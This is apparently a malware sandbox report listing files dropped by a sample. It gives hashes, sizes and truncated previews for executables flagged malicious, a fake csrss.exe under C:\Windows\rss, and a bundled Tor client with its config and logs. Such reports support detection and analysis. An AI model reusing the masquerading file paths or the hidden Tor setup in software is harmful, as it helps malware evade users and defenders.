                                                          Reputation:unknown
                                                          Preview:# Tor state file last generated on 2023-05-28 11:38:34 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 145 1..CircuitBuildTimeBin 165 1..CircuitBuildTimeBin 215 1..CircuitBuildTimeBin 245 1..CircuitBuildTimeBin 255 1..CircuitBuildTimeBin 295 1..CircuitBuildTimeBin 305 2..CircuitBuildTimeBin 345 1..CircuitBuildTimeBin 355 1..CircuitBuildTimeBin 445 1..CircuitBuildTimeBin 455 1..CircuitBuildTimeBin 505 2..CircuitBuildTimeBin 545 2..CircuitBuildTimeBin 645 1..CircuitBuildTimeBin 2655 1..Dormant 0..Guard in=default rsa_id=85C9E4FFF9B69D43CC54FCC706DAC8554C6C9580 nickname=Euphoria sampled_on=2023-05-23T09:52:06 sampled_idx=0 sampled_by=0.4.7.10 listed=1..Guard in=default rsa_id=06BBEAA6F73759A1795EB461D39D2AA168F305D1 nickname=r sampled_on=2023-05-17T12:52:52 sampled_idx=1 sampled_by=0.4.7.10 listed=1 confirmed_on=2023-05-18T02:48:11 confirmed_idx=0 pb_circ_attempts=7.000000 pb_circ_successes=7.000000 pb_successful_circuits_closed=7.
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1097742
                                                          Entropy (8bit):6.448650024927136
                                                          Encrypted:false
                                                          SSDEEP:6144:Or+pcbLisTa5ZhtuDDJhHbexoVNeRWmpVlZL88CAI9ll5K78LUcnRgFDpbV50DEn:JpGUZuIVcl5u8LFRPD+h3CUK94FV4I
                                                          MD5:8A574C633EB3C8B7D209B5940EBF731B
                                                          SHA1:E835C5668AD1437CEBDBD56BC7923C3683E8B9AD
                                                          SHA-256:BFD8DD86A41BC05BEEA0F240C35E88BD42ABADA70EFF4741717901D1B55BFB28
                                                          SHA-512:085EE9D9C52FD5F6FF2095727D9E3B1D27C5B2D3AB54CA11149954A4B031296C9CF9C81457A2DF8EBA916336CDEF4EA2BD39CF98D4AD19AB78E53AC85B6D6DEC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................#..........................@..................................A....@... .................................<................................>..........................$i..........................D............................text...4...........................`.P`.data...$...........................@.`..rdata..4O.......P...t..............@.`@/4..................................@.0@.bss.........p........................`..idata..<........ ...\..............@.0..CRT....0............|..............@.0..tls.................~..............@.0..reloc...>.......@..................@.0B........................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4466702
                                                          Entropy (8bit):6.437825090947764
                                                          Encrypted:false
                                                          SSDEEP:98304:rEEN8l5RbLMyGPpqrG6qqGJBLQIuSPG3W9tPo:rwl5RbLqpqrGvBLQI+h
                                                          MD5:055AE7C584A7B012955BF5D874F30CFA
                                                          SHA1:F2B4D8C5307FF09607BE929EC08FC2727BF03DCF
                                                          SHA-256:D51B5BF807F6DE3B5521B49B9A722592FB85AEE1EA2F1C03BBB5255D62BFB9C8
                                                          SHA-512:910BB0BE7A3840BB37CB453EA066677A5327E272CFA0995F7A600BD4EB2E7C31685DCC0758C3B2CF07C7622FD45B2D4CDD3A4272CDDAF9E97E2FFC48120646C5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........(D............#../..$D..`............0...@...........................D.....4.D...@... ...............................B..6............................B.............................Dm:.....................,.B.(............................text...../......./.................`.P`.data........0......./.............@.`..rdata........0.......0.............@.`@/4.......p....=..r....=.............@.0@.bss....._... B.......................`..idata...6....B..8....A.............@.0..CRT....0.....B......2B.............@.0..tls..........B......4B.............@.0..reloc........B......6B.............@.0B........................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (951)
                                                          Category:dropped
                                                          Size (bytes):2335545
                                                          Entropy (8bit):5.633016644635129
                                                          Encrypted:false
                                                          SSDEEP:12288:35scsA2FGSV9VK+UJFoX1HibnIwOt97mTNILhz9qL/COg5zI3dWbbA:3i3AGG4IWSIVt5mTShzuwz4dAA
                                                          MD5:B5F4106F219FC01DA4EE443BC0007878
                                                          SHA1:A29E63438405C75BFEC31E51F67260EF2E801077
                                                          SHA-256:788006221BF575E6ED466BA0C925C88FB88BAB955D22013864D72E3E2BAFFE61
                                                          SHA-512:18D22839BA0370BD39B4875C86A105DA4DE4449217FD335CE65C6BC217DB6E22814ACA4CE8DF77578651AFCE0EEA5B9B12A0A66FB6F3F6220FF2C737D7ED02FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 32.valid-after 2023-05-28 09:00:00.fresh-until 2023-05-28 10:00:00.valid-until 2023-05-28 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCi
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (951)
                                                          Category:dropped
                                                          Size (bytes):2335545
                                                          Entropy (8bit):5.633016644635129
                                                          Encrypted:false
                                                          SSDEEP:12288:35scsA2FGSV9VK+UJFoX1HibnIwOt97mTNILhz9qL/COg5zI3dWbbA:3i3AGG4IWSIVt5mTShzuwz4dAA
                                                          MD5:B5F4106F219FC01DA4EE443BC0007878
                                                          SHA1:A29E63438405C75BFEC31E51F67260EF2E801077
                                                          SHA-256:788006221BF575E6ED466BA0C925C88FB88BAB955D22013864D72E3E2BAFFE61
                                                          SHA-512:18D22839BA0370BD39B4875C86A105DA4DE4449217FD335CE65C6BC217DB6E22814ACA4CE8DF77578651AFCE0EEA5B9B12A0A66FB6F3F6220FF2C737D7ED02FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 32.valid-after 2023-05-28 09:00:00.fresh-until 2023-05-28 10:00:00.valid-until 2023-05-28 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCi
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):138254
                                                          Entropy (8bit):6.395685254326013
                                                          Encrypted:false
                                                          SSDEEP:1536:4Ep67NNeARQDjG1H0ZMnPHTFpl6CkTtWbn5TlE1nvraZrIOkIOWZBXsI7zCzI:4EpOfrRQrczFpqTsb5TlsDanKWZJCU
                                                          MD5:F08B1F044C68770C190DAF1EB1F3157E
                                                          SHA1:F94103A542459D60434F9DDB6B5F45B11EAE2923
                                                          SHA-256:1D0278386F8922BDF4808861E6E901541AD23CC6337BB022C78DC05915202F27
                                                          SHA-512:0667416A7515CD845E96D2AD26CA676CFFD2D1C9F0449FF05455E8CF6A7AB595D3F972785D051F45332C04F1C0B576726F645E3669122608A4F374E984BA161C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...#.|.........................c......................................@... ......................@.......P..<...............................X...........................$.......................PQ...............................text...dz.......|..................`.P`.data...L...........................@.0..rdata..PD.......F..................@.`@/4.......3.......4..................@.0@.bss....P....0........................`..edata.......@......................@.0@.idata..<....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..rsrc...............................@.0..reloc..X...........................@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (307), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5581
                                                          Entropy (8bit):5.079117697870165
                                                          Encrypted:false
                                                          SSDEEP:96:qnGDt8FXxcAoQmc/XCzgvGw0DpNf5yRF0a+P:CF8QmJ/zlNRyRqtP
                                                          MD5:2CB670195F5F3C9E5F3F77C54BE7FD62
                                                          SHA1:3048809C8C71F539BA396485430D4538D64871D3
                                                          SHA-256:CB377CCFCF8A3CB03F8613B6B57C79563F9B75E49D552F8F4542E71851331390
                                                          SHA-512:165B315AE9E047F61F752F3A34717AD32E2E5B4C6BAD90D6183982277D2F3521B8AC143F73DAF47043E74CA4B9D6E3B35133BA50E1C19292924431172E67BB87
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:May 28 11:32:20.000 [notice] Tor 0.4.7.10 (git-f732a91a73be3ca6) opening new log file...May 28 11:32:20.301 [notice] We compiled with OpenSSL 1010111f: OpenSSL 1.1.1q 5 Jul 2022 and we are running with OpenSSL 1010111f: 1.1.1q. These two versions should be binary compatible...May 28 11:32:20.301 [notice] Tor 0.4.7.10 (git-f732a91a73be3ca6) running on Windows 8 [or later] with Libevent 2.1.12-stable, OpenSSL 1.1.1q, Zlib 1.2.12, Liblzma N/A, Libzstd N/A and Unknown N/A as libc...May 28 11:32:20.301 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://support.torproject.org/faq/staying-anonymous/..May 28 11:32:20.408 [notice] Read configuration file "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc"...May 28 11:32:20.408 [warn] ControlPort is open, but no authentication method has been configured. This means that any program on your computer can reconfigure your Tor. That's bad! You should upgrade your Tor controller as soon as possible...May 28 11:32:20
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):230
                                                          Entropy (8bit):4.693556260377232
                                                          Encrypted:false
                                                          SSDEEP:6:cAiICN23fUKv21MRtSg1CN23fUKb3Tc1CN23fUKT:xBy1Qt/X7cXX
                                                          MD5:FC386F22CDDFD15CD40FAF7BD4653362
                                                          SHA1:E14C1A1381C49F494094E284C34063BDD1192E31
                                                          SHA-256:CC4B3D671F34CFBD28310B5C566E345EB68E37A59666346EF33B11BFFFBC832D
                                                          SHA-512:60EB04276262913FE7CD1EF1475F3E014468EA554FE2145AEE483584BC383896048E511614C907CE920D8BA70608562AEEABB650198C3C452FF1E37D1A84B5DD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:DataDirectory C:\Users\user\AppData\Local\Temp\csrss\tor\Tor.SOCKSPort 31464.ControlPort 31465.GeoIPFile C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\geoip.GeoIPv6File C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\geoip6.
                                                          Process:C:\Windows\servicing\TrustedInstaller.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8141793647547125
                                                          Encrypted:false
                                                          SSDEEP:96:2qsFXipHl+AVsgfiRqsdv6hnVW4NsIf6qlQsgP9wN0V/s5fR:2vg9QfgKRvA1AvISqzw2x5p
                                                          MD5:34C621CCAB26FF3DD9DAD0E80D11AA2A
                                                          SHA1:34250969F4620DD680835BD36135207A0906F462
                                                          SHA-256:82FE5086DFFA83B0ED218DA9523E5BDC5D4DE96D6800A8187FCB0DFDE069E648
                                                          SHA-512:8ED95F260379E524706B938FD34B66589A2C48C86EEB1D94FC5413D91B5927F8B09E720F7A6999FFE596850A859F8807850245A5848BA304EAACC561BBC4C4C3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.2023-05-28 11:29:51, Info CBS TI: --- Initializing Trusted Installer ---..2023-05-28 11:29:51, Info CBS TI: Last boot time: 2023-05-28 05:43:16.500..2023-05-28 11:29:51, Info CBS Starting TrustedInstaller initialization...2023-05-28 11:29:51, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2023-05-28 11:29:51, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2023-05-28 11:29:51, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2023-05-28 11:29:51, Info CBS Ending TrustedInstaller initialization...2023-05-28 11:29:51, Info CBS Starting the TrustedInstaller main loop...2023-05-28 11:29:51, Info CBS TrustedInstaller service starts successfully...2023-05-28 11:29:51, Info CBS No startup pr
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2148
                                                          Entropy (8bit):5.3400757759041335
                                                          Encrypted:false
                                                          SSDEEP:48:MbWSGfs4c4RQmFoUefamfgZ9tK8NPb17Iu1iMutgyV/gXJvUyTHc:CLGHcIFKLfbIZ2KRLum18
                                                          MD5:FD91683545A90147BD479AA5BCB80815
                                                          SHA1:153A88EF0D65FC3FD47EDEB50027CF3AD63950E5
                                                          SHA-256:65E55E07D42537DD3B1DCB9AA678B06CA98C298120F7D26DBEC0110EC60307F5
                                                          SHA-512:ADE13865FF2751CB80C069FE8390CC637F81B6DBE712A3483E376865A1CA3AEC0DFD094679568910759B69D42A0129BD9A3B646014ABC88393D06FDCAA141AB5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@...e.......................\.[.[...............................P................1]...E.....^.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................%`99B....9...........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4379008
                                                          Entropy (8bit):7.97472217525508
                                                          Encrypted:false
                                                          SSDEEP:98304:/RKU80KHe0iz3Dt6Ds6DV8G66EjKN69i5SvbFOqRrLfO2FnC86:/4e0i7Dt6XDGG/EjKN6LjxdFnC86
                                                          MD5:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          SHA1:45748A6D6474F470D44E848596E0E08BCE674996
                                                          SHA-256:626DF082C2624D9530794881921094AA100FA0A805B1544112D5A07DBE12CBC2
                                                          SHA-512:E1537B4EBF7DD9CF345B0F8C0646DE1DF1152469151B43CC8C08370EB3C40393940598DE98A11E47C9810D891942F385F7C6CB9AD4470A3C8941961B2A98247B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L.....a..................@..J&.....YN........@...@.................................5TC.....................................(.@.d....0e...............B......P...... ...............................P1..@............................................text....@.......@................. ..`.data...DX$...@.......@.............@....rsrc.....,..0e.......@.............@..@.reloc...Z...P...\...jB.............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):558
                                                          Entropy (8bit):4.895006803896944
                                                          Encrypted:false
                                                          SSDEEP:12:AXvkJFNqVIVhIe6NqVv16FNqVlU+N0uaHN1J+ykGm3E:AfE8ahIe68vo8O+eN7ZmU
                                                          MD5:C93D96A170E6D822681EA6A8BFC5998D
                                                          SHA1:2E482AFD90555685A7518C11276203602213493C
                                                          SHA-256:E212E2C01B7181D6BAE0BBC2E8D1B0375670F1D38CB3EC95F1DB640328FB2710
                                                          SHA-512:8A24FD7CF5041DC662FF6BB94FE1E522449E6514A95E6D933713208501E0FDF70BC54A766F52F3490AF2FB8F221448E42B4BCAB5D332F4AAE8C51B2B7C8A896E
                                                          Malicious:false
                                                          Reputation:unknown
